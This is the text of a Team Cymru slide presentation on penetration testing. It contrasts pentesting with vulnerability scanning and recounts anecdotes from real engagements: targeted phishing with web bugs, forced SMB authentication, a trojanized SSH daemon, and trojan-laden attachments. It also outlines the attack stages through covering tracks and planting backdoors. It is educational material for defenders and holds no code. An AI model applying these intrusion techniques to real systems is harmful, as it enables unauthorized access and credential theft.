Team Cymru Cymru Team Penetration Testing Ryan Connolly, ryan@cymru.com <http://www.cymru.com>
Penetration Testing Agenda • Pentesting Basics – Pentesting Defined – Vulnerability Scanning vs. Penetration testing • Pentesting Strategy • Anecdotes from real pentests • Conducting a good vulnerability scan – Footprint, Scan, Enumerate, Gain Access, Escalate, Pilfer, Cover Track, Create Backdoor – Demos • Review
Why Penetration Testing? • Financial institutions must secure their networks in order to maintain the security of the entire financial system • But with no ability to assess risk organizations are flying blind • IT Security assessments are done today with a mixture of Vulnerability Scanning and Penetration Testing
What is Penetration Testing?
Dave’s new job as a Pen Tester wasn’t anything at all like he’d expected
Penetration Testing Attempt to compromise security by using the same techniques of the attacker – If I was an attacker, how far would I be able to go? – How easy is it to compromise this computer | network | application | system ?
Vulnerability Scanning or Penetration Testing?
Vulnerability Scanning Look for evidence of – Vulnerable software versions – Presence or lack of patches – Misconfiguration
The “bad guys” don’t run Nessus
Vulnerability Scanning alone is not sufficient • Does not tell you what an attacker can do to your network today • Does not identify dangerous trust relationships between components • Lots of false-positives are produced – Must be manually verified • Only actionable items are list of missing patches
Organizations should take advantage of both VS and PT • VS provides a baseline from which to start building a risk profile • A Penetration Test illustrates what those vulnerabilities mean to the organization today, and can help verify remediation efforts • The financial system cannot afford for institutions not to perform periodic Penetration Tests
Key elements of a Penetration Test • Discover and exploit vulnerabilities throughout the network • Leverage trust-relationships among components • Access critical information
Example “After exploiting a vulnerability in the Exchange server, we were able to collect a list of valid email users and passwords. We then used this server to attack the database server in the DMZ (which wasn’t visible from the outside). One of the exploits was successful and we gained administrator access to the server, including complete access to all tables in the customers database.”
A good pen-test • Covers all relevant attack vectors • Clearly shows how vulnerable assets can be compromised • Tests the system as a whole, including existing defense mechanisms • Documents all activities performed
Common mistakes organizations make when doing PT • Limit the test to running a vulnerability scanner • Testing components in isolation • Company changes environment while test is being performed • Overlooking critical relationships, such as suppliers, partners and outsourcing/offshoring vendors
Signs that a test wasn’t thorough • Limited to small subset of network • Produced a laundry list of vulnerabilities, with no additional verification • No interpretation of findings, or “hand waving” • No recommendations beyond list of missing vendor patches • Lack of detailed activity logs, and/or problems with clean-up
Pentesting Strategy How much testing is good enough?
Managing Risk Risk Money
It is always possible to hack a network • It just depends on how hard you try • But smart companies – Invest in technology and processes that help them reduce the most risk, with the least amount of resources – Assume they will be hacked eventually and prepare accordingly
How often can we test cost- effectively? • Penetration Testing was traditionally done once or twice a year due to high cost of service • Automated Penetration Testing software is enabling organizations today to test more often – 75% of IMPACT customers doing testing on a monthly and weekly basis, in contrast with 50% doing it once or twice a year in late 2004
Security as an emergent property The security of a system is determined by the security of each of its components individually and of the system as a whole
Organizations are getting better at • Deploying OS updates on high-profile public servers • Hardening network services on public servers • Securing the perimeter with properly configured firewalls and routers
Penetrating a network through its perimeter is much more difficult today than it was 5 years ago
Organizations still have trouble with • Client side security • Custom web applications • Internal security • Dealing with continuous change and an ever- expanding network of partners, customers and suppliers
Attackers are not standing still • Industry data points to significant increase in the prevalence and criticality of client-side vulnerabilities – A “shift” towards finding vulnerabilities in client-side software is occurring (SANS and Symantec security threat reports) – 8 out of 20 categories in latest SANS Top 20 report relate directly to client-side vulnerabilities – High profile incidents taking advantage of vulnerabilities in client- side software • Windows Metafile image exploit in MySpace.com ad deploys trojan on compromised computers (July 06) • Organizations with good perimeter security are still wide open to attacks against client-side vulnerabilities
Client Side Vulnerabilities • Vulnerabilities in client-side software – IE, Firefox, Outlook, Thunderbird, MSN Messenger, AOL IM, ICQ, Media Players, and image and document readers/processors • Examples – IE devenum.dll COM Object vulnerability (MS05-038) – MSN messenger PNG Processing vulnerability (MS05-009) – Windows WMF vulnerability (KB912840) • Remote/Local, High/Medium/Low? – No good fit in current vulnerability taxonomies
The user’s workstation • is less protected & more complex than the publicly available servers • has legitimate access to the network’s critical assets • connects the Internet with the internal network
Internal network still wide open • Security much more relaxed than on public facing servers – Internal computers are not patched correctly even though automated patch mgmt is in place • Less (sometimes non-existent) network segmentation • Plenty of trust relationships that can be leveraged
Random anecdotes from real pen tests
Pen Test #1 • Collected valid email addresses using a badly configured SMTP server and a list of common names in various languages • Spammed targets with email probe – Web bug in <img> to fingerprint targets – UNC web bug to force authentication with a fake SMB server • Exploited Java vulnerability
Pen Test #2 • Collected e-mail addresses by searching MIT’s PGP keys server and internet newsgroups – Some mail archives had complete email headers • Created profile of each user – Workstation details: OS, browser, MUA – Personal details: hobbies, favorites, contacts, level of computer proficiency • Segmented attack and customized emails based on profile
Pen Test #2b • 1 single email produced about 40 different successful compromises in a matter of minutes • Done by hitting an e-mail alias for a mailing list
Pen Test #3 • Target network divided in two different company branches • Launched exploits against both sub-nets. Exploits for the 1 st failed, but for the 2 nd succeeded • Company had network intrusion prevention active on one side of the network but not on the other
Pen Test #4 • Compromised ad-hoc test server with old exploit • Replaced SSH daemon with trojan • Collected usernames and passwords that were valid on other more important servers on the network
Simple attacks still work • Sent trojanized executable as menu for new Pizzeria • Engage in conversation via IM and send a trojan • Fedex “sample CD-ROMs” with active content
A good pen-test • Covers all relevant attack vectors • Clearly shows how vulnerable assets can be compromised • Tests the system as a whole, including existing defense mechanisms • Documents all activities performed
The Pentesting Process Think like the bad guys: use the same process. Consider: 1. Social engineering factor 2. Technical factor 3. Iterative learning
Pentesting Vulnerability Scanning Now that we’ve talked about not just doing vulnerability scans, let’s talk about… Vulnerabilty scaninng!
Network attack process Create Backdoor Cover Tracks Pilfer Escalate Gain Access Enumerate Scan Footprint
Footprinting • Techniques: –Open source search –whois –DNS zone transfers • Tools: –USENet, search engines –networksolutions.com, other registrars – nslookup, dig • Objective: –IP addresses –Domain names
Recommend
More recommend